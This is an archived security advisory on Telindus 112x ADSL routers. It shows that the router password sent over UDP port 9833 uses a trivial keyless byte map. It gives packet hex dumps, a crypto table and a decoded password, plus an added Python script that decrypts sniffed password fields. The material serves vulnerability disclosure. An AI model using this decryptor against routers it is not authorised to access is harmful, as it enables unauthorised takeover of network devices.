24th Feb 2003 [SBWID-6014]
COMMAND
	Telindus password recovery due to weak encryption scheme
SYSTEMS AFFECTED
	Telindus ADSL router 112x, firmware release 6.0.x
PROBLEM
	In Elia Florio's ("ioProgrammo" [http://www.edmaster.it/ioprogrammo],
	[[email protected]]) advisory:
	An old security problem for Telindus 112x  series  (and  Arescom  NetDSL
	1000 too) is well documented here:
	
	 http://www.tigerteam.it/files/telindus-advisory.txt       (english)
	 http://www.tigerteam.it/files/telindus-advisory.IT.txt    (italian)
	
	There is a new exploit to crack the router password, partially based on
	this old problem, which Telindus fixed by introducing a new firmware
	release (6.0.x) in which the UDP packets on port 9833 (containing the
	plain-text password) are encrypted, to ensure product security.
	However, after some study, I discovered that the encryption scheme is
	trivial and can be broken using information which the router itself
	reveals to the user (the router name).
	NOTE: The encryption scheme was successfully decrypted on 2 routers
	supplied by different ISPs: MATAV (Hungary) and Telecom (Italy), both
	with 6.0.x firmware.
	 [---------------------------------------------------------------------]
	PROOF OF CONCEPT:
	Using a sniffer, I captured an (encrypted) packet from a 1124 router and
	compared it with another (unencrypted) packet taken from a router which
	has the old firmware (< 6.0.x). This procedure (how to capture the
	packet) was explained in a previous security advisory (by others) and
	is based on UDP sniffing on port 9833 while "Telindus 9100 M.
	Application" is trying to contact the router over the LAN.
	
	                            CIPHER-TEXT
	0100  00 03 02 00 08 00 00 A2 A3 2B 63 4B 73 23 AB 99    .........+cKs#..
	0110  02 0A 22 9A 61 02 93 7B AB A3 2B 90 08 08 00 2B    ..".a..{..+....+
	0120  6B 7B AB 9B 28 08 10 01 92 72 22 99 89 91 B1 82    k{..(....r".....
	0130  42 29 6A A2 62 49 61 03 B3 2B 91 01 B1 71 81 71    B)j.bIa..+...q.q
	0140  91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 89 C9    .....).S.a......
	0150  D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01    ................
	0160  E0 08 98 00 30 00 2E C0 9F 0A 88 08 B0 00 30 00    ....0.........0.
	0170  85 38 9A 64 0A 00 18 00 10 00 02 00 20 00 10 00    .8.d........ ...
	0180  00 09 30 00 00 09 38 00 00 09 40 00 00 09 80 00    ..0...8...@.....
	0190  10 00 10 0A 20 00 00 08 20 00 10 00 00 10 50 00    .... ... .....P.
	01A0  10 00 00 0A 30 00 10 00 00 0A 48 00 20 00 00 00    ....0.....H. ...
	01B0  00 0A 88 00 02 10 28 00 02 11 10 00 00 20 40 00    ......(...... @.
	                            PLAIN-TEXT
	0100  00 03 00 01 01 00 00 05-44 53 4C 30 30 01 01 00   ........DSL00...
	0110  0D 31 31 31 31 31 31 31-31 31 31 31 31 31 01 02   .1111111111111..
	0120  00 32 4E 44 31 30 36 30-56 45 2D 54 4C 49 2C 20   .2ND1060VE-TLI,
	0130  76 65 72 20 35 2E 33 2E-31 31 42 3B 54 68 75 20   ver 5.3.11B;Thu
	0140  44 65 63 20 20 36 20 31-36 3A 33 36 3A 33 33 20   Dec  6 16:36:33
	0150  32 30 30 31 01 33 00 02-00 3C 01 13 00 06 00 60   2001.3...<.....`
	0160  6C 1D BD 7E 01 16 00 06-00 00 86 60 62 F7 04 08   l..~.......`b...
	0170  00 02 00 01 04 15 00 02-00 FF 01 0D 00 04 00 00   ................
	0180  00 00 01 0E 00 04 00 00-00 00 01 14 00 02 00 00   ................
	0190  40 03 00 02 00 00 40 04-00 02 00 00 01 26 00 00   @.....@......&..
	01A0  01 27 00 00 01 28 00 00-01 30 00 02 00 02 01 44   .'...(...0.....D
	01B0  00 00 42 05 00 00 42 22-00 00 04 18 00 00 08 FF   ..B...B"........
	
	Both payloads begin with the byte sequence "00 03 xx xx xx 00 00".
	In the plain packet we can read the router name and the password: each
	text string is preceded by an important byte, which stores the string
	length:
	
	05-44 53 4C 30 30 01 01 00
	^^----------------------------------> length of string "DSL00"
	0D 31 31 31 31 31 31 31-31 31 31 31 31 31 01 02 00
	^^----------------------------------> length of string "1111111111111"
	
	I suppose that "0x 0x 00" is a kind of termination sequence for the
	<router name> and <password> fields.
	Now look at the encrypted packet: because its total length is similar
	to that of the plain packet (>200 bytes), I suppose that "A2" is now an
	encrypted length byte, so the router name field begins after this byte.
	But I know the router name, because Telindus 9100 M. Application shows
	it to me during the connection test with the router. In this case it
	was "Telindus ADSL Router", very long! I think that is enough to begin
	a cryptanalytic attack on the packet.
	"Telindus ADSL Router" [20 bytes = 14h]  crypto-length = A2
	
	T  e  l  i  n  d  u  s     A  D  S  L     R  o  u  t  e  r 
	A3 2B 63 4B 73 23 AB 99 02 0A 22 9A 61 02 93 7B AB A3 2B 90  encrypted
	54 65 6C 69 6E 64 75 73 20 41 44 53 4C 20 52 6F 75 74 65 72  plain ASCII
	
	Looking at this, I suppose that:
	1) the encryption scheme is based on a fixed crypto system
	   ("e", "u", "t" are encrypted in the same way throughout the text)
	2) there is a special encryption for stop/mark bytes between
	   words (add -2 or -3 to the final char: R=93 / r=90 ????)
	3) the encryption scheme is case sensitive
	Trying to write a crypto table, I notice that every letter is coded
	from the previous one by adding 8 to the crypto-byte. For example r=93,
	then s=9B...
	
	CRYPTO TABLE (hex codes)
	-------------------------------------
	CHAR    CRYPT    PLAIN
	a       0B       61
	b       13       62
	c       1B       63
	d       23       64
	e       2B       65
	f       33       66
	g       3B       67
	h       43       68
	i       4B       69
	j       53       6A
	k       5B       6B
	l       63       6C
	m       6B       6D
	n       73       6E
	o       7B       6F
	p       83       70
	q       8B       71
	r       93       72
	s       9B       73
	t       A3       74
	u       AB       75
	v       B3       76
	w       BB       77
	y       C3       78
	x       CB       79
	z       D3       7A
	... 
	1       89       31
	2       91       32
	3       98       33
	...
	
	I think that the encryption function is very similar to this:
	
	ENCRYPT(x) = x*8 + int(x/20h) - int(x/20h)*100h
	
	For example ("q" = 71h):
	
	ENCRYPT(71h) = 71h*8 + 71h/20h - (71h/20h)*100h = 388h + 3 - 300h = 8Bh
	
	There are some encryption variants for blank space, capitals and the
	last letters of words.
	Now, where is the router password in the encrypted packet? After 20
	bytes (the router name length in this case) there is "08 08 00",
	probably a field marker, then there is 2B, which is the crypto-length
	of the password.
	The encrypted password string begins there.
	Using the table, I can unmask the real router password:
	
	   m  o  u  s  e  
	2B 6B 7B AB 9B 28 08 10 01 
	^^----------------------------------crypto length of password
	
	Other information can also be decrypted:
	
	N  D  S  1  2  6  0  H  E  -  T  L  I
	72 22 99 89 91 B1 82 42 29 6A A2 62 49 61 03 
	v  e  r     6  .  0  .  2  7     T  u  e     J  u  l     3  0     
	B3 2B 91 01 B1 71 81 71 91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 
	1  9  :  1  6  :  3  6     2  0  0  2
	89 C9 D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01
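
	The following is an added worked example; it is not code from the
	advisory, from Telindus or from the "9100 M. Application". It encodes
	the per-byte map the advisory infers, checks it against the advisory's
	crypto table and against the captured router-name bytes (the
	known-plaintext comparison above), and then inverts it. All hex strings
	are copied from the advisory's dumps. The context rule used to resolve
	ambiguous bytes in decrypt_field() is our own assumption, not something
	the advisory states. It also shows what the advisory's observations
	imply from the defender's side: there is no key, so one known string
	(the router name shown to every user) is enough to recover the whole
	table for every unit running this firmware.

```python
# Added example (not the advisory's or Telindus' code): the keyless byte map
# the advisory infers, checked against its table and captured bytes, then
# inverted.  Hex strings are copied from the advisory's dumps; the context
# rule in decrypt_field() is our assumption.

PRINTABLE = range(0x20, 0x7F)            # ASCII space .. '~'


def encrypt_byte(x: int) -> int:
    """ENCRYPT(x) = x*8 + int(x/20h) - int(x/20h)*100h, as written in the
    advisory.  No key is involved: a byte always maps to the same output."""
    k = x // 0x20                        # int(x/20h)
    return (x * 8 + k - k * 0x100) & 0xFF


# The advisory's CRYPTO TABLE (CHAR -> CRYPT).  The advisory prints the x and
# y rows in swapped order; they are listed here in ASCII order.
ADVISORY_TABLE = dict(zip(
    "abcdefghijklmnopqrstuvwxyz",
    [0x0B, 0x13, 0x1B, 0x23, 0x2B, 0x33, 0x3B, 0x43, 0x4B, 0x53, 0x5B, 0x63, 0x6B,
     0x73, 0x7B, 0x83, 0x8B, 0x93, 0x9B, 0xA3, 0xAB, 0xB3, 0xBB, 0xC3, 0xCB, 0xD3]))
ADVISORY_TABLE.update({"1": 0x89, "2": 0x91, "3": 0x98})


def table_mismatches() -> dict:
    """Table rows the formula does not reproduce, as char -> (printed, computed).
    Only '3' disagrees: the formula gives 99h, which is also what the captured
    "19:16:36" bytes show for '3', so 98h in the table looks like a slip."""
    return {c: (v, encrypt_byte(ord(c))) for c, v in ADVISORY_TABLE.items()
            if encrypt_byte(ord(c)) != v}


# Router-name bytes from the CIPHER-TEXT dump (offset 0x108 onward).
ROUTER_NAME_CT = bytes.fromhex("A32B634B7323AB99020A229A6102937BABA32B90")
# Password bytes that follow the 2B length byte.
PASSWORD_CT = bytes.fromhex("6B7BAB9B28")


def known_plaintext_deltas(plain: str, captured: bytes) -> list:
    """Known-plaintext check: captured - ENCRYPT(plain) per position, as a
    signed byte.  0 means the fixed map alone explains that byte; the non-zero
    entries are the word-final / capital / space variants the advisory notes."""
    deltas = []
    for p, c in zip(plain.encode("ascii"), captured):
        d = (c - encrypt_byte(p)) % 256
        deltas.append(d - 256 if d > 127 else d)
    return deltas


# Inverse over printable ASCII.  The map is injective there, so one entry each.
INVERSE = {encrypt_byte(x): chr(x) for x in PRINTABLE}
MAX_SHIFT = 3                            # advisory: word-final bytes lowered by 2 or 3


def char_class(ch: str) -> str:
    if ch.islower():
        return "lower"
    if ch.isupper():
        return "upper"
    if ch.isdigit():
        return "digit"
    return "other"


def candidates(b: int) -> list:
    """(shift, char) pairs that could have produced b, unshifted first."""
    return [(s, INVERSE[(b + s) & 0xFF]) for s in range(MAX_SHIFT + 1)
            if ((b + s) & 0xFF) in INVERSE]


def decrypt_field(data: bytes) -> str:
    """Invert the map byte by byte.  A shifted word-final letter can collide
    with an unshifted character (r-2 = 91h = '2'), so when a byte has several
    candidates we prefer the one in the same character class as the previous
    output character.  This context rule is our assumption; the advisory
    resolved such bytes by hand."""
    out = []
    for b in data:
        cands = candidates(b)
        if not cands:
            out.append("?")
            continue
        prev_class = char_class(out[-1]) if out else None
        same = [ch for _, ch in cands if char_class(ch) == prev_class]
        out.append(same[0] if same else cands[0][1])
    return "".join(out)


if __name__ == "__main__":
    print("table rows the formula disagrees with:",
          {c: (hex(p), hex(q)) for c, (p, q) in table_mismatches().items()})
    print("router-name deltas:", known_plaintext_deltas("Telindus ADSL Router", ROUTER_NAME_CT))
    print("password:          ", decrypt_field(PASSWORD_CT))
    print("firmware string:   ", decrypt_field(bytes.fromhex("B32B9101B171817191B9")))
```

	The deltas for "Telindus ADSL Router" are zero at 14 of 20 positions;
	the rest are the +1 / -1 / -2 / -3 variants the advisory mentions for
	capitals, spaces and word-final letters. decrypt_field() only tries
	upward shifts, so it recovers "mouse", "ver 6.0.27" and "19:16:36", but
	not the mixed-case model field ("NDS1260HE-TLI"), where a capital can
	also be shifted the other way and the advisory decoded by hand.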
	
	 [----------------------------------------------------------------------]
SOLUTION
	n/a